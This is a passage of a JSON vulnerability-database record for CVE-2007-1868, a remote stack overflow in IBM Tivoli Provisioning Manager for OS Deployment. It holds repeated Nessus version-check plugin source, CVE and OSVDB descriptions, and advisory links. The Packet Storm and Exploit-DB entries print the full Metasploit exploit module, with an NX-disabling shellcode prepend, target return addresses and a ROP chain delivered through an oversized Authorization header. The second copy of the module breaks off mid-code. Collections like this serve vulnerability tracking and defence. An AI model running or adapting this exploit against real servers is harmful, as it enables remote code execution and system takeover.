Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-09-01T23:59:06"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software has multiple buffer overflow vulnerabilities in the HTTP server. 
\n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "c307db61c83e10c3011410605085bce39945afa45f1fe8610ada4332211d4110", "hashmap": [{"hash": "85a6c5133fe23e3fb62cd513e84dcfe6", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "bcda3dd992ec63798c57203a5174837f", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c1eb153e88b304c888f879c8769e6f5b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "069b44d7d28f0d59f4f00d546b1e024d", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2018-08-30T19:51:13", "modified": "2018-07-12T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n 
script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network 
Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:51:13"}], "edition": 9, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "069b44d7d28f0d59f4f00d546b1e024d"}, {"key": "cvelist", "hash": "20da9bf6c60b37a5b8675145f0c864a4"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "bd78ab9e79208a1da8b5ab749c184394"}, {"key": "href", "hash": "f4d1f5e609cae4ee6d91e16160ff5ec0"}, {"key": 
"modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "07a0416e4de2a26a0531240b230d9eca"}, {"key": "pluginID", "hash": "2354ec2849bd2954df8dd2f2199d58a2"}, {"key": "published", "hash": "76c0ef0b59b698ecbd2c12ca69581342"}, {"key": "references", "hash": "8dad7d1e40f541c1d75ace060f4569f3"}, {"key": "reporter", "hash": "828360cd7777de6cfb948a0046bacf67"}, {"key": "sourceData", "hash": "85a6c5133fe23e3fb62cd513e84dcfe6"}, {"key": "title", "hash": "3614afb82498c2eae7cadd4b6504e12e"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "a1725a94b91472a7061a7570e311049a9bedc746bb7b21d0c96398e53af785db", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1868"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7526", "SECURITYVULNS:DOC:16934", "SECURITYVULNS:VULN:7566"]}, {"type": "nessus", "idList": ["IBM_TPMFOSD_CORRUPTION.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83093"]}, {"type": "osvdb", "idList": ["OSVDB:34678"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/IBM_TPMFOSD_OVERFLOW"]}, {"type": "exploitdb", "idList": ["EDB-ID:16810"]}], "modified": "2019-11-01T02:47:28"}, "score": {"value": 9.1, "vector": "NONE", "modified": "2019-11-01T02:47:28"}, "vulnersScore": 9.1}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager 
for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: 
Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "naslFamily": "Web Servers", "pluginID": "25149", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "The management service in IBM Tivoli Provisioning Manager for OS Deployment before 5.1 Fix Pack 2 does not properly handle multipart/form-data in HTTP POST requests, which allows remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via crafted POST requests to port 8080/tcp or 443/tcp.", "modified": "2017-07-29T01:31:00", "id": "CVE-2007-1868", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1868", "published": "2007-04-04T16:19:00", "title": "CVE-2007-1868", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg24015347)\n[Secunia Advisory ID:24717](https://secuniaresearch.flexerasoftware.com/advisories/24717/)\nOther Advisory URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=498\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0025.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0028.html\nFrSIRT Advisory: ADV-2007-1199\n[CVE-2007-1868](https://vulners.com/cve/CVE-2007-1868)\nBugtraq ID: 23264\n", "modified": "2007-03-31T18:49:00", "published": "2007-03-31T18:49:00", "href": "https://vulners.com/osvdb/OSVDB:34678", "id": "OSVDB:34678", "title": "IBM Tivoli Provisioning Manager for OS Deployment multipart/form-data Handling Remote Code Execution", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:43", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": 
"https://packetstormsecurity.com/files/83093/IBM-TPM-for-OS-Deployment-5.1.0.x-rembo.exe-Buffer-Overflow.html", "id": "PACKETSTORM:83093", "type": "packetstorm", "title": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow', \n'Description' => %q{ \nThis is a stack overflow exploit for IBM Tivoli Provisioning Manager \nfor OS Deployment version 5.1.0.X. \n}, \n'Author' => 'toto', \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-1868'], \n[ 'OSVDB', '34678'], \n[ 'BID', '23264'], \n[ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-05' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 0x200, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c&=+?:;-,/#.\\\\$%\\x1a\", \n'Prepend' => \n# Disable NX on 2k3 to upload data on the stack \n# (service crashes if the stack is switched to the heap) \n\"\\x64\\x8b\\x0d\\x30\\x00\\x00\\x00\" + # mov ecx, dword ptr fs:[0x30] ; PEB \n\"\\x83\\xb9\\xa4\\x00\\x00\\x00\\x05\" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5 \n\"\\x75\\x30\" + # jnz after \n\"\\x83\\xb9\\xa8\\x00\\x00\\x00\\x02\" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2 \n\"\\x75\\x27\" + # jnz after \n\"\\x81\\xb9\\xac\\x00\\x00\\x00\\xce\\x0e\\x00\\x00\" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0) \n\"\\x76\\x1b\" + # jbe after 
\n\"\\x8d\\x89\\xa8\\x00\\x00\\x00\" + # lea ecx, [ecx+0xa8] \n\"\\xba\\x00\\x03\\xfe\\x7f\" + # mov edx, 0x7ffe0300 \n\"\\xb8\\xed\\x00\\x00\\x00\" + # mov eax, 0xed \n\"\\x6a\\x04\" + # push 4 \n\"\\x51\" + # push ecx \n\"\\x6a\\x22\" + # push 22 \n\"\\x6a\\xff\" + # push -1 \n\"\\x6a\\xff\" + # push -1 (padding) \n\"\\xff\\x12\", # call dword ptr[edx] \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['TMPfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }], \n# tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll) \n['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }], \n], \n'DisclosureDate' => 'May 02 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptBool.new('SSL', [true, 'Use SSL', true]), \n], self.class ) \nend \n \ndef exploit \n \nif target.name =~ /2003/ \n# the exploit allocates and executable heap to copy and execute the payload \n \nauth = Rex::Text.rand_text_alphanumeric(2800) \n \nib = target['IB'] \n \nauth[ 2080, 4 ] = [ ib + 0x11010 ].pack('V') # store a data to prevent a crash \n \n# ret 1: \n# 76a81a5f: \n# pop esi <- 0x76a91010 \n# pop ebx <- 0x76a91010 \n# pop ebp <- 0x76a91010 \n# retn \n \nauth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V') \nauth[ 2100, 4 ] = [ target['Data'] ].pack('V') \nauth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V') \nauth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V') \n \n# ret 2: \n# 76a817f0: \n# pop esi <- 0x76a81512 (ocscpy pointer) \n# retn \n \nauth[ 2112, 4 ] = [ ib + 0x17f0 ].pack('V') \nauth[ 2116, 4 ] = [ ib + 0x1512 ].pack('V') \n \n# ret 3: (copy the payload in atl.dll data) \n# 76a811c8 \n# lea eax, [esp+3c] <-- eax points to the payload \n# push eax <- payload \n# push ebp <- 0x76a91010 \n# call esi <- ocscpy \n# cmp eax, ebx <- eax == ebx = 0x76a91010 \n# jnz before <- jump not taken \n# mov eax, ebp \n# pop edi \n# pop esi \n# pop ebp \n# pop ebx \n# add esp, 1ch \n# retn \n \nauth[ 
2120, 4 ] = [ ib + 0x11c8 ].pack('V') \n \n \n# ret 4: (increase the stack pointer to allow a jump back in the payload) \n# add esp, 1ch \n# retn \n \nauth[ 2160, 4 ] = [ ib + 0x11da ].pack('V') \nauth[ 2184, 2 ] = \"\\xeb\\x56\" # jmp payload \n \n \n# ret 5: (create an executable heap - huge one) \n# 76a8c0c4 \n# jmp ds:__imp_HeapCreate (0xffffffff, 0x01010101, 0x01010101) \n \nauth[ 2196, 4 ] = [ ib + 0xc0c4 ].pack('V') \n \n# ret 6: \n# 76a817f0 \n# pop esi <- 0x76a92a38 (hHeap) \n# retn \n \nauth[ 2204, 4 ] = [ ib + 0x17f0 ].pack('V') \nauth[ 2208, 4 ] = [ 0xffffffff ].pack('V') \nauth[ 2212, 4 ] = [ 0x01010101 ].pack('V') \nauth[ 2216, 4 ] = [ 0x01010101 ].pack('V') \nauth[ 2220, 4 ] = [ ib + 0x12a38 ].pack('V') \n \n# ret 7: \n# 76a8190a \n# mov [esi], eax <- store new heap in hHeap \n# mov eax, esi \n# pop esi \n# retn 4 \n \nauth[ 2224, 4 ] = [ ib + 0x190a ].pack('V') \n \n# ret 8 (_calloc - needed to allocate a small buffer to prevent a no mem exception): \n# 76a88a29 \n# mov eax, [esp+arg_0] <- 0x7fffffa0 \n# imul eax, [esp+arg_4] <- eax * 0x7fffffa0 = 0x2400 \n# push eax \n# call _malloc \n# pop ecx <- ecx = 0x2400 \n# retn \n \nauth[ 2232, 4 ] = [ ib + 0x8a29 ].pack('V') \n \n# ret 9: \n# 76a8c9ab \n# add esp, 0ch \n# retn 4 \n \nauth[ 2240, 4 ] = [ ib + 0xc9ab ].pack('V') \nauth[ 2244, 4 ] = [ 0x7fffffa0 ].pack('V') \nauth[ 2248, 4 ] = [ 0x7fffffa0 ].pack('V') \n \n# ret 10 (copy payload into heap): \n# 76a8c9a0 \n# push ecx <- 0x2400 \n# push [esp+8] <- 0x76a91010 (payload in atl.dll data) \n# push eax <- heap pointer \n# call _memcpy \n# add esp, 0ch \n# retn \n \nauth[ 2256, 4 ] = [ ib + 0xc9a0 ].pack('V') \n \n# ret 11 (jump into heap) \n# 76a815e7 \n# call eax \n \nauth[ 2264, 4 ] = [ ib + 0x15e7 ].pack('V') \nauth[ 2268, 4 ] = [ ib + 0x11010 ].pack('V') \n \nauth[ 2272, payload.encoded.length ] = payload.encoded \n \nelse \nauth = Rex::Text.rand_text_alphanumeric(2800) \n \nauth[ 2080, 4 ] = [ target['Rets'][1] ].pack('V') \nauth[ 2096, 4 ] = [ 
target['Rets'][2] ].pack('V') # pop, ret \nauth[ 2100, 4 ] = [ target['Rets'][1] ].pack('V') \nauth[ 2104, 4 ] = [ target['Rets'][0] ].pack('V') # jmp esp \nauth[ 2108, payload.encoded.length ] = payload.encoded \n \nend \n \nprint_status(\"Trying target #{target.name}...\") \n \nres = send_request_cgi({ \n'uri' => '/', \n'method' => 'GET', \n'headers' => \n{ \n'Authorization' => \"Basic #{auth}\" \n} \n}, 5) \n \nhandler \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83093/ibm_tpmfosd_overflow.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T06:33:46", "bulletinFamily": "exploit", "description": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow. CVE-2007-1868. Remote exploit for windows platform", "modified": "2010-09-20T00:00:00", "published": "2010-09-20T00:00:00", "id": "EDB-ID:16810", "href": "https://www.exploit-db.com/exploits/16810/", "type": "exploitdb", "title": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow", "sourceData": "##\r\n# $Id: ibm_tpmfosd_overflow.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\r\n\t\t\t\tfor OS Deployment version 5.1.0.X.\r\n\t\t\t},\r\n\t\t\t'Author' => 'toto',\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-1868'],\r\n\t\t\t\t\t[ 'OSVDB', '34678'],\r\n\t\t\t\t\t[ 'BID', '23264'],\r\n\t\t\t\t\t[ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-05' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 0x200,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c&=+?:;-,/#.\\\\$%\\x1a\",\r\n\t\t\t\t\t'Prepend' =>\r\n\t\t\t\t\t\t\t# Disable NX on 2k3 to upload data on the stack\r\n\t\t\t\t\t\t\t# (service crashes if the stack is switched to the heap)\r\n\t\t\t\t\t\t\t\"\\x64\\x8b\\x0d\\x30\\x00\\x00\\x00\" + # mov ecx, dword ptr fs:[0x30] ; PEB\r\n\t\t\t\t\t\t\t\"\\x83\\xb9\\xa4\\x00\\x00\\x00\\x05\" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5\r\n\t\t\t\t\t\t\t\"\\x75\\x30\" + # jnz after\r\n\t\t\t\t\t\t\t\"\\x83\\xb9\\xa8\\x00\\x00\\x00\\x02\" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2\r\n\t\t\t\t\t\t\t\"\\x75\\x27\" + # jnz after\r\n\t\t\t\t\t\t\t\"\\x81\\xb9\\xac\\x00\\x00\\x00\\xce\\x0e\\x00\\x00\" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> 
SP0)\r\n\t\t\t\t\t\t\t\"\\x76\\x1b\" + # jbe after\r\n\t\t\t\t\t\t\t\"\\x8d\\x89\\xa8\\x00\\x00\\x00\" + # lea ecx, [ecx+0xa8]\r\n\t\t\t\t\t\t\t\"\\xba\\x00\\x03\\xfe\\x7f\" + # mov edx, 0x7ffe0300\r\n\t\t\t\t\t\t\t\"\\xb8\\xed\\x00\\x00\\x00\" + # mov eax, 0xed\r\n\t\t\t\t\t\t\t\"\\x6a\\x04\" + # push 4\r\n\t\t\t\t\t\t\t\"\\x51\" + # push ecx\r\n\t\t\t\t\t\t\t\"\\x6a\\x22\" + # push 22\r\n\t\t\t\t\t\t\t\"\\x6a\\xff\" + # push -1\r\n\t\t\t\t\t\t\t\"\\x6a\\xff\" + # push -1 (padding)\r\n\t\t\t\t\t\t\t\"\\xff\\x12\", # call dword ptr[edx]\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['TPMfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }],\r\n\t\t\t\t\t# tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll)\r\n\t\t\t\t\t['TPMfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'May 02 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(443),\r\n\t\t\t\tOptBool.new('SSL', [true, 'Use SSL', true]),\r\n\t\t\t], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tif target.name =~ /2003/\r\n\t\t\t# the exploit allocates and executable heap to copy and execute the payload\r\n\r\n\t\t\tauth = Rex::Text.rand_text_alphanumeric(2800)\r\n\r\n\t\t\tib = target['IB']\r\n\r\n\t\t\tauth[ 2080, 4 ] = [ ib + 0x11010 ].pack('V') # store a data to prevent a crash\r\n\r\n\t\t\t# ret 1:\r\n\t\t\t# 76a81a5f:\r\n\t\t\t# pop esi <- 0x76a91010\r\n\t\t\t# pop ebx <- 0x76a91010\r\n\t\t\t# pop ebp <- 0x76a91010\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V')\r\n\t\t\tauth[ 2100, 4 ] = [ target['Data'] ].pack('V')\r\n\t\t\tauth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V')\r\n\t\t\tauth[ 